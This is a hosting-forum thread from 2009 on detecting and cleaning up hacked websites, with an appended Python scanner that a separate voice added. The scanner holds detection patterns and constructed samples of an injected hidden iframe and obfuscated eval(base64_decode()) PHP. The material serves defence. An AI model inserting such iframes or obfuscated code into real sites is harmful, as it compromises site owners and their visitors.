From my short visit to the PHPBB3 website, I get the sense that PHPBB3 also uses this modular updating approach, where the public does not see the details of the code that is being modified when they issue a security patch, that it is done more or less automatically.
mark anthony
10-17-09, 09:40 AM
hi there!!
How will I know that my account or site is being hacked? I am suspecting something's bad happening to my site
rainbore
10-17-09, 11:46 AM
One way to check your site is to use Google's Safebrowsing diagnostic tool. Just enter
http://www.google.com/safebrowsing/diagnostic?site=www.yoursite.com
Just replace "www.yoursite.com" with your own domain name. This tool will show you if any of Stopbadware's partners have reported your site as being suspicious. Another good online tool is Unmask Parasites (http://www.unmaskparasites.com/) which scans webpages for common hacks in real time. If you know HTML, there's a new tool in the Google Webmaster Tools console under "Labs" that will show you what Googlebot sees when it fetches pages from your site. Some hacks only reveal themselves to Googlebot, so this can be useful. Another good idea is to do a simple "site:" search in Google to see if Google has indexed anything that you don't recognize as your own.
You can also use the Powweb File Manager or whatever FTP program you use to check the modification dates on all of the files on your site. If the dates on the site don't match the dates when you last uploaded the files or if the file sizes don't match, it's a sign of trouble.
There's some very good information available at stopbadware.org's Tips for Cleaning and Securing Your Website (http://www.stopbadware.org/home/security).
Anti-virus and anti-malware software that runs on your home computer is designed to detect and remove infections that attack your PC, and every webmaster should be sure to use such software to prevent their website account information from being stolen. This is becoming a more common issue, although it still is not how the majority of sites get hacked. But these programs are generally ineffective at scanning webpages and other files for signs of hacking, so downloading your files to scan them is unlikely to do any good.
If you run any blog, forum, gallery, CMS, shopping cart or other common script, you should make it a part of your routine site maintenance to check to make sure that you are running the latest version. By far the most common means by which hackers gain access to a site is through known vulnerabilities in older versions of popular scripts. Since many scripts promote themselves automatically on every page they generate, often all that a hacker has to do to locate a vulnerable site is to do a Google search for the software name and the version number, so don't think that just because your site isn't that popular or that you don't do much with these scripts that you are safer.
GoldenEagles
10-17-09, 09:58 PM
Rainbore, that was altogether a good and informative post. However, I would address this particular point ....
Anti-virus and anti-malware software that runs on your home computer is designed to detect and remove infections that attack your PC .... But these programs are generally ineffective at scanning webpages and other files for signs of hacking, so downloading your files to scan them is unlikely to do any good.
After recognizing the hack attack on my website which inserted a rogue iframe tag in every html page, and index.php pages, hundreds of pages altogether, I replaced all the html pages with clean pages. Because of the complexity of the file structure I did not do this for my Zen Cart installation. For this, I zipped the whole installation, and then downloaded the archive to my PC. I then ran an Avira scan on that zipped archive, and Avira found every rogue iframe, and it also found three additional trojan scripts, the purpose of which I am assuming, was to give the hacker direct access to my website.
Therefore, I must observe, that your statement quoted above, "that these programs are generally ineffective at scanning webpages and other files for signs of hacking, so downloading your files to scan them is unlikely to do any good ..." seems to be too broad a generalization. It may be true that some anti-virus packages may not be useful in this regard. But Avira seemed to do an excellent job in the situation I just described.
Croc Hunter
10-18-09, 02:21 PM
I disagree GoldenEagle, rainbore's advice is entirely accurate. Most people have never even heard of Avira. It's not in the current top ten most popular antivirus. Big brand names like Norton and PC-Cillin don't even rank; that puts you in the minority. The lucky minority at that in this case.
I pretty much told you it was Zencart back on post #51 ~smack~ Look in your antivirus vault, name the 3 rogue files you found and where exactly you found them. It will help others here and I'd like to research them further. It is more than likely your Zencart database is corrupt so delete "drop" it if you can along with any other unused databases. Then check all user tables of remaining databases for suspect entries.
Chris_S
10-19-09, 02:28 AM
6. Reset all OPS, FTP, and database passwords (use strong passwords). Reflect these changes in your config files. Set Chmod permissions on all folders 755 and all files 644.
What do you mean by reflect your changes in the config files?
GoldenEagles
10-19-09, 02:59 AM
Most people have never even heard of Avira. It's not in the current top ten most popular antivirus.
Since 2004, Av-Comparatives.Org has run comprehensive tests on a variety of anti-virus products. They have included Avira in the tests since 2006.
avast! Professional Edition 4.8
AVG Anti-Virus 8.5
AVIRA AntiVir Premium 9
BitDefender Antivirus 2010
eScan Anti-Virus 10
ESET NOD32 Anti-Virus 4.0
F-Secure Anti-Virus 2010
G DATA AntiVirus 2010
Kaspersky Anti-Virus 2010
Kingsoft Antivirus 2009
McAfee VirusScan Plus 2009
Microsoft Live OneCare 2.5
Norman Antivirus & Anti-Spyware 7.10
Sophos Anti-Virus 7.6
Symantec Norton Anti-Virus 2010
TrustPort Antivirus 2009
Avira not only had the overall highest detection rate, but Avira had the highest detection rate in each of the test categories.
Windows Viruses
Macro viruses
Script Malware
Worms
Backdoors/Bots
Trojans
other malware
I hope this information update will be helpful to you.
Try this .ftpaccess to limit FTP access through your IP only. Try this not sure will work
upload the file to root. enter your IP instead of w.x.y.z!!!!
# .ftpaccess in the site root (ProFTPD syntax, assumed from the file name):
# the Allow line is checked first, so only the listed address gets through;
# every other client is refused all FTP commands.
<Limit ALL>
  Order allow,deny
  Allow from w.x.y.z
  DenyAll
</Limit>
snowmaker
10-25-09, 02:52 AM
Try this .ftpaccess to limit FTP access through your IP only. Try this not sure will work..
It does. For me anyway.. I'm quite sure it'll work for everybody else too..
Another good tool to use is the website secunia.org. They have a page http://secunia.com/advisories/product/ that will list known vulnerabilities for a vast number of applications including zencart, phpbb, etc.
A few additional things that should trigger anybody to be cautious and check their account for signs of unauthorized activity:
- sudden large number of unfamiliar email bouncebacks
- sudden large increase in site traffic seen through visitor stats without a marketing campaign
- A file in your account executes code that has been obfuscated
Obfuscation is usually done through base64 encoding / decoding but may also be done through character switching, character arrays, and many other methods.
Please feel free to contact support if you suspect a file in your account has been hacked and need help.
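An added example, not posted by anyone in this thread, that turns the checks discussed above (rainbore's modification-date check, GoldenEagles' rogue iframes, and the obfuscated base64 code in the list just above) into one script you run over a downloaded copy of your site. The sample file contents, the `example.invalid` host and the indicator names are constructed for the example.

```python
import os
import re

# Indicators of the tampering described in this thread, as regexes over file
# contents: a hidden/zero-size iframe injected into pages, PHP that decodes and
# executes obfuscated code, and a long base64 blob (the usual obfuscation carrier).
INDICATORS = {
    "hidden_iframe": re.compile(
        r"<iframe[^>]*(?:width\s*=\s*[\"']?0\b|height\s*=\s*[\"']?0\b"
        r"|visibility\s*:\s*hidden|display\s*:\s*none)", re.IGNORECASE),
    "eval_decode": re.compile(
        r"\b(?:eval|assert)\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(",
        re.IGNORECASE),
    "long_base64_blob": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
}

def find_indicators(text):
    """Names of all indicators that match the given file contents, sorted."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def scan_tree(root, modified_after=None, exts=(".php", ".html", ".htm", ".js")):
    """Walk a local copy of the site; return {path: [indicator, ...]} for files
    that match, also flagging files whose mtime is newer than `modified_after`
    (a Unix timestamp for your last known-good upload)."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_indicators(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if modified_after is not None and os.path.getmtime(path) > modified_after:
                hits.append("modified_after_cutoff")
            if hits:
                findings[path] = hits
    return findings

# Constructed sample contents (not the thread's real infected files).
SAMPLE_INJECTED_HTML = ('<html><body>Welcome<iframe src="http://example.invalid/x" '
                        'width="0" height="0"></iframe></body></html>')
SAMPLE_OBFUSCATED_PHP = '<?php eval(base64_decode("' + "QUFB" * 80 + '")); ?>'
SAMPLE_CLEAN_HTML = "<html><body><p>Hello</p></body></html>"

if __name__ == "__main__":
    for label, sample in (("injected html", SAMPLE_INJECTED_HTML),
                          ("obfuscated php", SAMPLE_OBFUSCATED_PHP),
                          ("clean html", SAMPLE_CLEAN_HTML)):
        print(label, "->", find_indicators(sample) or "no indicators")
    # scan_tree("/path/to/downloaded/site", modified_after=<last upload timestamp>)
```

A hit only means the file deserves a look; compare it against your own clean copy before deleting anything, since legitimate pages can use base64 or hidden frames.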